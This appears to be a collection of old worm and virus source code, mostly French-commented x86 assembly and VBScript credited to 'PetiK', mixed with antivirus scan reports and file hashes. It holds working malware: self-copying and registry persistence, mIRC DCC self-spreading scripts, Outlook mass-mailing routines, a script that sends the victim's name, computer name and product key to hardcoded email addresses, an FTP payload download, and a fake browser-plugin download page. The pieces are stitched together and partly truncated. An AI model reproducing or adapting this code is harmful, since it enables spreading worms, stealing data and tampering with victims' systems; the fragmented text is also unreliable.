TEXTE db "VOUS SOUHAITE UNE BONNE ANNEE !",00h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wsecond WORD ?
wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>
.code
DEBUT:
AUTO_COPIE:
push 00000000h
call GetModuleHandleA
push 260
push offset moi
push eax
call GetModuleFileNameA
push 260
push offset targ1
call GetWindowsDirectoryA
push offset copie
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%windir%\WinExec.exe
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE2
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE2 ;%windir%\WinExec.exe
push 01h
push 0
push offset NOM2
push p
call RegSetValueExA ;CREE UNE VALEUR
push 0
call RegCloseKey ;FERME LA BASE DE REGISTRE
REGISTRE:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE ;PandaKiller
push 01h
push 0
push offset NOM ;DANS RegisteredOwner
push p
call RegSetValueExA ;CREE UNE VALEUR
push 0
call RegCloseKey ;FERME LA BASE DE REGISTRE
MESSAGE:push 40h
push offset TITRE
push offset TEXTE
push 0
call MessageBoxA
FIN:
push 0
call ExitProcess
end DEBUT
File W32PKc.exe received on 05.16.2009 10:42:04 (CET)
Additional information
File size: 8192 bytes
MD5...: a133a8af3b031045bd0ae4c7d9fa4210
SHA1..: d3481290f42e9f1485d7d9cdc5184159e5272297
comment $
*** ** * * *** ** * * * * * **** ***
* * * * ** * * * * * * * * * * * * *
* * * * ** * * * * * ** * * * ** * *
* * **** * ** * * **** ** * * * * ***
* * * * ** * * * * * * * * * * * *
* * * * * *** * * * * * **** **** **** * *
.386
jumps
locals
.model flat, stdcall
;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn CloseHandle:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn GetSystemTime:PROC
;USER32.dll
extrn MessageBoxA:PROC
extrn SwapMouseButton:PROC
extrn ExitWindowsEx:PROC
extrn GetVersionExA:PROC
;ADVAPI32.dll
extrn RegCreateKeyExA:PROC
extrn RegCloseKey:PROC
.data
szOrig db 260 dup (0)
szCopie db 260 dup (0)
szWsk1 db 260 dup (0)
szWsk2 db 260 dup (0)
szWin db 260 dup (0)
szWin2 db 260 dup (0)
fh dd 0
octets dd 0
regDisp dd 0
regResu dd 0
Copie db "\WinExec.exe",00h
Wsk1 db "\WSOCK32.DLL",00h
Wsk2 db "\WSOCK32.TPK",00h
Wininit db "\\WININIT.INI",00h
windows db "windows",00h
run db "run",00h
Winini db "\\WIN.INI",00h
nul db "NUL",00h
rename db "Rename",00h
ini db "C:\script.tpk",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
CLE db "Software\[PandaKiller]",00h
TITRE db "Error Loader",00h
TEXTE db "Windows NT required !",0dh,0ah
db "This program will be terminated",00h
inid db "[script]",0dh,0ah
db "n0=on 1:start:{",0dh,0ah
db "n1=.remote on",0dh,0ah
db "n2=.ctcps on",0dh,0ah
db "n3= .events on",0dh,0ah
db "n4=}",0dh,0ah
db "n5=on 1:join:#:{",0dh,0ah
db "n6= if ( $nick == $me ) { halt } | .dcc "
db "send $nick C:\Windows\WinExec.exe",0dh,0ah
db "n7=}",0dh,0ah
initaille equ $-inid
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wsecond WORD ?
wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>
.code
DEBUT: mov eax, offset CLE ; V‚rifie si il existe une cl‚
call REG ; [PandaKiller] dans HKLM\Software.
cmp [regDisp],1 ; Si elle n'y est pas,
jne FICHIER ; il installe les composants
WCOPIE: push 0 ;
call GetModuleHandleA ;
push 260 ; Le programme se copie dans le
push offset szOrig ;
push eax ;
call GetModuleFileNameA ; dossier WINDOWS de l'ordinateur
push 260 ;
push offset szCopie ; et se nommera WinExec.exe
call GetWindowsDirectoryA ;
push offset Copie ;
push offset szCopie ;
call lstrcat ;
push 0 ;
push offset szCopie ;
push offset szOrig ;
call CopyFileA ;
WSOCK32:push 260 ;
push offset szWsk1 ; Ici, on copie le fichier du
call GetSystemDirectoryA ; r‚pertoire SYSTEM, WSOCK32.DLL
push 260 ;
push offset szWsk2 ; en WSOCK32.TPK dans le mˆme
call GetSystemDirectoryA ; r‚pertoire SYSTEM
push offset Wsk1 ;
push offset szWsk1 ;
call lstrcat ;
push offset Wsk2 ;
push offset szWsk2 ;
call lstrcat ;
push 0 ;
push offset szWsk2 ;
push offset szWsk1 ;
call CopyFileA ;
WININIT:push 260 ; Pour que l'ordinateur puisse
push offset szWin ; utiliser le nouveau fichier
call GetWindowsDirectoryA ; WSOCK32.TPK, on va ‚crire dans
push offset Wininit ; le fichier WININIT.INI dans le
push offset szWin ; r‚pertoire WNDOWS.
call lstrcat ; La routine est simple :
push offset szWin ;
push offset szWsk1 ;
push offset nul ;
push offset rename ; [Rename]
call WritePrivateProfileStringA ; NUL=%system%\WSOCK32.DLL
push offset szWin ;
push offset szWsk2 ;
push offset szWsk1 ;
push offset rename ;
call WritePrivateProfileStringA ; %sys%\WSOCK32.DLL=%sys%\WSOCK32.TPK
jmp FICHIER
Additional information
File size: 8192 bytes
MD5...: f7b2facb5e2c9e5870065004446a8867
SHA1..: 837ce36b596ffab1af92ac1c63506fa613e16e6c
comment * ///// I-Worm.MadCow par PetiK ///// 25/11/2000
jumps
locals
.386
.model flat,stdcall
;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn MoveFileA:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
;ADVAPI32.dll
extrn RegSetValueExA:PROC
extrn RegCreateKeyExA:PROC
extrn RegCloseKey:PROC
.data
regDisp dd 0
regResu dd 0
l dd 0
p dd 0
fh dd 0
octets dd ?
szOrig db 260 dup (0)
szOrig2 db 260 dup (0)
szCopie db 260 dup (0)
szCopi2 db 260 dup (0)
szCico db 260 dup (0)
szWin db 260 dup (0)
Dossier db "C:\Win32",00h
fichier db "C:\Win32\Salut.ico",00h
Copico db "\MSLS.ICO",00h
Copie db "\Wininet32.exe",00h
Copie2 db "\MadCow.exe",00h
BATFILE db "C:\Win32\ENVOIE.BAT",00h
VBSFILE db "C:\Win32\ENVOIE.VBS",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
fileini db "C:\Win32\script.ini",00h
Copie3 db "C:\Win32\MadCow.exe",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
CLE db "Software\[Atchoum]",00h
CLE2 db "\exefile\DefaultIcon",00h
Signature db "IWorm.MadCow par PetiK (c)2000"
vbsd:
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'EMAIL()',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db 'Sub EMAIL()',0dh,0ah
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'If O = 1 Then',0dh,0ah
db 'N.BCC = P.Address',0dh,0ah
db 'Else',0dh,0ah
db 'N.BCC = N.BCC & "; " & P.Address',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'N.Subject = "Pourquoi les vaches sont-elles folles ?"',0dh,0ah
db 'N.Body = "Voila un rapport expliquant la folie des vaches"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"MadCow.exe")',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End Sub',0dh,0ah
vbstaille equ $-vbsd
batd:
db '@echo off',0dh,0ah
db 'start C:\Win32\ENVOIE.VBS',0dh,0ah
battaille equ $-batd
inid:
db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick C:\Win32\MadCow.exe",0dh,0ah
db "n3=}",00h
initaille equ $-inid
include icone.inc
.code
DEBUT:
VERIF: mov eax,offset CLE ; Vérifie si il existe une clé
call REG ; [Atchoum] dans HKLM\Software.
cmp [regDisp],1 ; Si elle n'y est pas,
jne INIFILE ; on installe les composants
COPIE: push 0 ;
call GetModuleHandleA ;
push 260 ;
push offset szOrig ;
push eax ;
call GetModuleFileNameA ; Copie le fichier original
push 260 ;
push offset szCopie ;
call GetSystemDirectoryA ; dans le dossier SYSTEM
push offset Copie ;
push offset szCopie ;
call lstrcat ; sous le nom de Wininet32.exe
push 00h ;
push offset szCopie ;
push offset szOrig ;
call CopyFileA ;
push 260 ; puis
push offset szCopi2 ;
call GetWindowsDirectoryA ; … nouveau dans le dossier WINDOWS
push offset Copie2 ;
push offset szCopi2 ;
call lstrcat ; sous le nom de MadCow.exe
push 00h ;
push offset szCopi2 ;
push offset szOrig ;
call CopyFileA ;
COPYWIN:push 0 ;
call GetModuleHandleA ;
push 260 ;
push offset szOrig2 ;
push eax ;
call GetModuleFileNameA ; Copie le fichier original
push 00h ;
push offset Copie3 ;
push offset szOrig2 ;
call CopyFileA ;
jmp FIN ;
end DEBUT
File MadCow.exe received on 05.16.2009 17:51:57 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.worm.8192
AntiVir 7.9.0.168 2009.05.15 Worm/Petik
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Petik.E
Avast 4.8.1335.0 2009.05.15 IRC:Generic-008
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.IM.5B177226
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.A
ClamAV 0.94.1 2009.05.16 Worm.Madcow
Comodo 1157 2009.05.08 Worm.Win32.Petik.Z
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.8192.B/C
F-Prot 4.4.4.56 2009.05.16 W32/Petik.E
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik.E@mm
GData 19 2009.05.16 Generic.Malware.IM.5B177226
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick@mm
NOD32 4080 2009.05.15 Win32/Petik.Z
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8192.D
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.A
PCTools 4.4.2.0 2009.05.16 VBS.LoveLetter
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.x
Sophos 4.41.0 2009.05.16 W32/Petik-A
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.E
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.LoveLetter
Additional information
File size: 8192 bytes
MD5...: 15b037d0d23a915fb0a78961cdc7299a
SHA1..: 85864e397e3fee261bdcb62b477a71e936db39f6
;Par M.Xxxxxxx XXXXXXX (c)2000
;TAILLE : 1034 OCTETS
;DWARF4 MODIFIE LA DATE AU 26 DECEMBRE 1999
;C:\DWARF.VBS QUI AJOUTE UN CLE DANS LA BASE DE REGISTRE
;C:\WINDOWS\DWARF.BAT QUI AFFICHE UN MESSAGE A CHAQUE DEMARRAGE
.model small
.code
org 100h
NOM1 db 'c:\dwarf.vbs',0
NOM2 db 'c:\WINDOWS\Panda.bat',0
prog1 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
db 'msgbox "BONNO JOURNEE ?"',0Dh,0Ah
db 'Dim W',0Dh,0Ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\dwarf.bat"'
progl1 equ $-prog1
prog2 db '@echo off',0Dh,0Ah
db 'if exist c:\dwarf.vbs del c:\dwarf.vbs',0Dh,0Ah
db 'cls',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo UNE BOMBE A ETE PLACE DANS TON ORDINATEUR',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo DANS 5 SECONDES TU VAS MOURIR',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'choice /c:Q /t:Q,5 /n Le compte à rebours a commencé',0Dh,0Ah
db 'if errorlevel 1 goto Die',0Dh,0Ah
db ':Die',0Dh,0Ah
db 'cls',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo *** *** *** * *',0Dh,0Ah
db 'echo * * * * * * ** **',0Dh,0Ah
db 'echo * * * * * * * * *',0Dh,0Ah
db 'echo * * * * * * * *',0Dh,0Ah
db 'echo * * * * * * * *',0Dh,0Ah
db 'echo * * * * * * * *',0Dh,0Ah
db 'echo *** *** *** * *',0Dh,0Ah
progl2 equ $-prog2
CORBEILLE db 'C:\RECYCLED\*.*',0
msg db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh
db 'IL SE NOMME C:\dwarf.vbs',10,10,13
db 'OUVRE LE VITE $'
end DATE
' Name : VBS.Judge.A
' Author : PetiK
' Language : VBS
' Date : 08/12/2000
Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbs = file.ReadAll
DEBUT()
Sub DEBUT()
Set win = fso.GetSpecialFolder(0)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(win&"\WinGDI.EXE.vbs")
c.Copy("C:\Judge.TXT.vbs")
ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\WinGDI",win&"\WinGDI.EXE.vbs"
EMAIL()
'FTP()
'AUTOEXEC()
TXT()
End Sub
Sub EMAIL()
If Not fso.FileExists("C:\Judge.txt") Then
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "BatMan, SpiderMan et les autres"
msg.Body = "La vraie histoire de ces justiciers"
msg.Attachments.Add "C:\Judge.TXT.vbs"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if
End If
End Sub
Sub FTP()
If Not fso.FileExists("C:\Judge.txt") Then
Set bat = fso.CreateTextFile(win&"\FTP.bat")
bat.WriteLine "@echo off"
bat.WriteLine "start ftp -i -v -s:C:\FTP.drv"
bat.close
Set drv = fso.CreateTextFile("C:\FTP.drv")
drv.WriteLine "open"
drv.WriteLine "members.aol.com"
drv.WriteLine "pentasm99"
drv.WriteLine "binary"
drv.WriteLine "lcd C:\"
drv.WriteLine "get virus.exe"
drv.WriteLine "bye"
drv.WriteLine "exit"
drv.close
ws.Run (win&"\FTP.bat")
End If
End Sub
Sub AUTOEXEC()
If Day(Now) = 1 then
Set FileObj = CreateObject("Scripting.FileSystemObject")
file = "c:\autoexec.bat"
Set InStream= FileObj.OpenTextFile (file, 1, False, False)
TLine = Instream.Readall
Set autobat= FileObj.CreateTextFile (file, True, False)
autobat.write(tline)
autobat.WriteBlankLines(1)
autobat.WriteLine "@echo off"
autobat.WriteLine "cls"
autobat.WriteLine "echo."
autobat.WriteLine "echo."
autobat.WriteLine "echo VBS.Judge.A par PetiK (c)2000"
autobat.WriteLine "echo."
autobat.WriteLine "echo TON ORDINATEUR VIENT DE MOURIR"
autobat.WriteLine "pause"
End If
End Sub
Sub TXT()
Set ptk = fso.CreateTextFile("C:\Judge.txt")
ptk.WriteLine "Si vous lisez ce texte,"
ptk.WriteLine "c'est que Microsoft a encors fait des siennes"
ptk.Close
Set mp3 = fso.OpenTextFile("C:\Salut.mp3",2,true)
mp3.Write vbs
mp3.close
End Sub
File Judge.TXT.vbs received on 05.16.2009 17:42:50 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Anjulie
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.03
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 VBS/Petik.L@mm
Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen
AVG 8.5.0.336 2009.05.15 VBS/VBSWG
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.A9DC8F67
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 Worm.VBS-14
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Petik
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Buggy
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.L@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Judge.A
GData 19 2009.05.16 Generic.ScriptWorm.A9DC8F67
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 VBS/Generic
McAfee+Artemis 5616 2009.05.15 VBS/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.03
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.I
NOD32 4080 2009.05.15 VBS/Petik.A
Norman 6.01.05 2009.05.16 VBS/GenMail.D
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.A@mm
Panda 10.0.0.14 2009.05.16 VBS/I-Worm
PCTools 4.4.2.0 2009.05.16 VBS.Petik.I
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Hopalong
Sophos 4.41.0 2009.05.16 VBS/Judge
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.B@mm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_JUDGE.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.I
Additional information
File size: 2587 bytes
MD5...: 538a05a6e0dd048eae2c3b06338bd5d7
SHA1..: fef767df96e3dbeb009d6cd746bee12c33fb3257
' Name : VBS.Noel
' Author : PetiK
' Language : VBS
' Date : 12/12/2000
Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
DEBUT()
Sub DEBUT()
Set win = fso.GetSpecialFolder(0)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy("C:\NOEL.GIF.vbs")
EMAIL()
End Sub
Sub EMAIL()
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "JOUYEUX NOEL"
msg.Body = "Voici une photodu PERE NOEL"
msg.Attachments.Add ("C:\NOEL.GIF.vbs")
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
End if
Set msg2 = OApp.CreateItem(0)
msg2.BCC = "Panda34@caramail.com; Pif878@aol.com"
nom = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
CN = CreateObject("WScript.NetWork").ComputerName
msg2.Subject = "Message de """ & nom & """ alias " & CN & ""
page = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
PK = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\ProductKey")
msg2.Body = "-IE : """ & page & """ -Produkt Key """ & PK & """"
msg2.Send
End Sub
File NOEL.GIF.vbs received on 05.11.2009 07:04:27 (CET)
Additional information
File size: 1352 bytes
MD5...: fcc75e971157a8d9103b5bc583847f87
SHA1..: 2fd63f05fb1a2ee79db2d227f902f94fa12851b5
comment $
POUR COMPILER:
.386
jumps
locals
.model flat, stdcall
;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn ExitProcess:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
;USER32.dll
extrn MessageBoxA:PROC
;ADVAPI32.dll
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
.data
fh dd ?
octets dd ?
regDisp dd 0
regResu dd 0
l dd 0
p dd 0
szBAT db 260 dup (0)
szCopie db 260 dup (0)
szOrig db 260 dup (0)
szHTM db 260 dup (0)
szVBS db 260 dup (0)
szWin db 260 dup (0)
Copie db "\NAV5.exe",00h
BATFILE db "\IE55.bat",00h
HTMFILE db "\IE55.htm",00h
VBSFILE db "\IE55.vbs",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
CLE db "Software\[PetiK]",00h
CLE2 db "\Software\Microsoft\Internet Explorer\Main",00h
NOM2 db "Start Page",00h
vbsd:
db 'rem IE55.vbs pour W32.TWiN',0dh,0ah
db '',0dh,0ah
db 'Dim fso,ws,file',0dh,0ah
db 'Set fso = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set ws = CreateObject("WScript.Shell")',0dh,0ah
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'Set win = fso.GetSpecialFolder(0)',0dh,0ah
db 'Set sys = fso.GetSpecialFolder(1)',0dh,0ah
db 'ws.Run (sys&"\IE55.htm")',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\'
db 'Download Directory","C:\"',0dh,0ah
db 'If fso.FileExists("C:\PlugIE55.exe") Then',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\'
db 'Start Page","http://www.atoutmicro.ca/viralert.htm"',0dh,0ah
db 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\'
db 'PlugIE55","C:\PlugIE55.exe"',0dh,0ah
db 'End If',0dh,0ah
db 'MIRC()',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db 'Sub MIRC()',0dh,0ah
db 'On Error Resume Next',0dh,0ah
db 'If fso.FileExists("C:\mirc\script.ini") Then',0dh,0ah
db ' Set c = (sys&"\NAV5.exe")',0dh,0ah
db ' c.Copy("C:\mirc\XPICTURE.exe")',0dh,0ah
db ' Set srpt = fso.CreateTextFile("C:\mirc\script.ini",true)',0dh,0ah
db ' srpt.WriteLine "[script]"',0dh,0ah
db ' srpt.WriteLine "n0=on 1:JOIN:#:{"',0dh,0ah
db ' srpt.WriteLine "n1= /if ( $nick == $me ) { halt }"',0dh,0ah
db ' srpt.WriteLine "n2= /.dcc send $nick C:\mirc\XPICTURE.exe"',0dh,0ah
db ' srpt.WriteLine "n3=}"',0dh,0ah
db ' srpt.Close',0dh,0ah
db 'End If',0dh,0ah
db 'End Sub',0dh,0ah
vbstaille equ $-vbsd
htmd:
db '<HTML><HEAD>',0dh,0ah
db '<TITLE>Plugin pour Internet Explorer / '
db 'Plugin for Internet Explorer</TITLE>',0dh,0ah
db '<SCRIPT language="JavaScript">',0dh,0ah
db 'site="http://www.multimania.com/kadosh/PlugIE55.exe ";',0dh,0ah
db 'temps = 10;',0dh,0ah
db '',0dh,0ah
db 'function affiche()',0dh,0ah
db '{ if (temps-- == 0) ',0dh,0ah
db ' { clearInterval(attente);',0dh,0ah
db ' location.href=site;',0dh,0ah
db ' return;',0dh,0ah
db ' }',0dh,0ah
db ' document.forms[0].elements[0].value = temps;',0dh,0ah
db '}',0dh,0ah
db '</SCRIPT>',0dh,0ah
db ' ',0dh,0ah
db '</HEAD>',0dh,0ah
db '<BODY bgColor=black text=red onload='''attente = setInterval'
db '("affiche()", 1000);'''>',0dh,0ah
db '<DIV align=center>',0dh,0ah
db '<H1>Plugin pour Microsoft Internet Explorer</H1>',0dh,0ah
db '<H1>Plugin for Microsoft Internet Explorer</H1>',0dh,0ah
db '</DIV>',0dh,0ah
db '<DIV align=left>',0dh,0ah
db '<HR SIZE=4>',0dh,0ah
db '<H3>Merci de télécharger le plugin dans le réperoire C:\</H3>',0dh,0ah
db '<H3>Please download the plugin in C:\ path</H3>',0dh,0ah
db '<HR SIZE=1>',0dh,0ah
db '</DIV>v
db '<DIV align=center>',0dh,0ah
db '<FORM><BIG>Téléchargement dans <INPUT size=1 value=8> secondes</BIG>',0dh,0ah
db '</FORM></DIV></BODY></HTML>',0dh,0ah
htmtaille equ $-htmd
batd:
db '@echo off',0dh,0ah
db 'start C:\WINDOWS\SYSTEM\IE55.vbs',00h
battaille equ $-batd
.code
DEBUT: mov eax, offset CLE ; Vérifie si il existe une clé
call REG ; [PetiK] dans HKLM\Software.
cmp [regDisp],1 ; Si elle n'y est pas, il se copie
jne FIN ; puis modifie le fichier WIN.INI
WCOPIE: push 0 ;
call GetModuleHandleA ;
push 260 ; Le programme se copie dans le
push offset szOrig ;
push eax ;
call GetModuleFileNameA ; dossier WINDOWS de l'ordinateur
push 260 ;
push offset szCopie ; et se nommera NAV5.exe
call GetWindowsDirectoryA ;
push offset Copie ;
push offset szCopie ;
call lstrcat ;
push 0 ;
push offset szCopie ;
push offset szOrig ;
call CopyFileA ;
FIN: push 0 ;
call ExitProcess ; Fin du Programme
end DEBUT
IE55.HTM
<HTML><HEAD>
<TITLE>Plugin pour Internet Explorer / Plugin for Internet Explorer</TITLE>
<SCRIPT language="JavaScript">
site="http://www.multimania.com/kadosh/PlugIE55.exe ";
temps = 10;
function affiche()
{ if (temps-- == 0)
{ clearInterval(attente);
location.href=site;
return;
}
document.forms[0].elements[0].value = temps;
}
</SCRIPT>
</HEAD>
<BODY bgColor=black text=red onload='attente = setInterval("affiche()", 1000);'>
<DIV align=center>
<H1>Plugin pour Microsoft Internet Explorer</H1>
<H1>Plugin for Microsoft Internet Explorer</H1>
</DIV>
<DIV align=left>
<HR SIZE=4>
<H3>Merci de télécharger le plugin dans le réperoire C:\</H3>
<H3>Please download the plugin in C:\ path</H3>
<HR SIZE=1>
</DIV>
<DIV align=center>
<FORM><BIG>Téléchargement dans <INPUT size=1 value=8> secondes</BIG>
</FORM></DIV></BODY></HTML>
' Name : VBS/mIRC/NetWork.A
' Author : PetiK
' Language : VBS
' Date : 29/12/2000
Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
set file = fso.OpenTextFile(WScript.ScriptFullName,1)
